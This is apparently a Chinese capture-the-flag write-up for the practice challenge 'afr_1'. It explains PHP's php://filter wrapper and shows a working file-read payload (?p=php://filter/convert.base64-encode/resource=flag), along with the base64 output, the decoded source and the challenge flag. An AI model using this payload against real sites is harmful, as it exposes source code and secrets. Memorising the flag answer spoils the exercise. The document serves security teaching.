靶场：afr_1

知识点

• PHP向用户提供的指定待打开文件的方式，是一个文件流
• PHP的Filter机制，可对目前的协议进行一定的处理，比如将当前文件流的内容进行Base64编码。
• http://127.0.0.1/cmd.php?file=php://filter/convert.base64-encode/resource=cmd
• 利用Filter机制，构造形如以上的攻击数据可以读取文件，拿到各种文件的源码

解题过程

1. 首页
   http://c31a4949-59d4-407e-ac06-ca7850b56265.node4.buuoj.cn:81/?p=hello
   2. 使用php://filter读取源代码并进行base64编码输出
   http://c31a4949-59d4-407e-ac06-ca7850b56265.node4.buuoj.cn:81/?p=php://filter/convert.base64-encode/resource=flag

PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9

3. 使用base64解码

<?php
die('no no no');
//n1book{afr_1_solved}

Flag:n1book{afr_1_solved}